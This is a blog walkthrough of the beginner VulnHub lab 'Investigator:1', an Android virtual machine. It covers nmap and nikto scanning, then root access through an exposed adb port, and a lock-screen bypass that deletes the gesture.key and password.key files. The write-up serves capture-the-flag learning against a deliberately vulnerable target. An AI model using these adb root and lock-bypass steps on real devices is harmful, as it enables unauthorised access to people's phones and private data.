medium.com

Investigator:1 Vulnhub Writeup

VAISHALI KUMARI
5–6 minutes

VAISHALI KUMARI

Be the investigator to finish this machine,Its for only beginners, Share your Screen shot on telegram group, Group link will be in flag.

Author: Sivanesh Kumar

Download link- https://download.vulnhub.com/investigator/Investigator.ova

SCANNING

Scanning target ip-address using nmap full port scanning

nmap -p- 192.168.122.136

Press enter or click to view image in full size

Lets find out service version.

nmap -sV -A 192.168.122.136

Press enter or click to view image in full size

nmap -sV -A -p 22000 192.168.122.136

Press enter or click to view image in full size

After finding ip address lets do vulnerability scanning.

nmap -sV -A — script vuln -p 5555,8080,22000 192.168.122.136

root@kali:~# nmap -sV -A --script vuln -p 5555,8080,22000 192.168.122.136
Starting Nmap 7.70 ( https://nmap.org ) at 2020-07-08 07:51 EDT
Nmap scan report for 192.168.122.136
Host is up (0.0014s latency).
PORT      STATE SERVICE  VERSION
5555/tcp  open  freeciv?
8080/tcp  open  http     PHP cli server 5.5 or later
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-majordomo2-dir-traversal: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
22000/tcp open  ssh      Dropbear sshd 2014.66 (protocol 2.0)
MAC Address: 00:0C:29:5F:64:48 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT     ADDRESS
1   1.42 ms 192.168.122.136
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 632.98 seconds
root@kali:~#

We found nothing usefull in vulnerability scanning.

Enumeration

Lets open port 8080 in web browser.

Press enter or click to view image in full size

Running nikto. nikto -h http://192.168.122.136:8080/

Press enter or click to view image in full size

We found nothing usefull

After this i use dirb to retrieve more directories and found backdoor.php. But it says fake backdoor.

Press enter or click to view image in full size

After some research on port 5555, I found 5555 can be exploited using adb.

To install adb:

  1. in kali use command - sudo apt-get install adb
  2. in windows download appie

Lets connect android device using adb.

Get VAISHALI KUMARI’s stories in your inbox

Join Medium for free to get updates from this writer.

adb connect 192.168.122.136:5555

adb shell

Press enter or click to view image in full size

su root (used to substitute as root user)

Press enter or click to view image in full size

Exploitation

After getting root shell, go to directory data/root

cd /data/root

Press enter or click to view image in full size

We found flag.txt.

Press enter or click to view image in full size

But this is the first level, We found some secret key. It can be password of lock screen.

I tried unlocking lockscreen password using secret key but failed to open it.

Then i remove gesture.key and password.key files to bypass lockscreen.

cd /data/system

rm gesture.key

Press enter or click to view image in full size

rm password.key

Press enter or click to view image in full size

After deleting both files reboot android device using command

adb reboot

Press enter or click to view image in full size

And then try to unlock device by pressing enter.

Press enter or click to view image in full size

After searching for flag, i found it in messaging app. It was also asking for password. I used secret key password 259148637 as pattern to unlock it.

Press enter or click to view image in full size

Successfully found flag in (666) 666-6666 message.

Press enter or click to view image in full size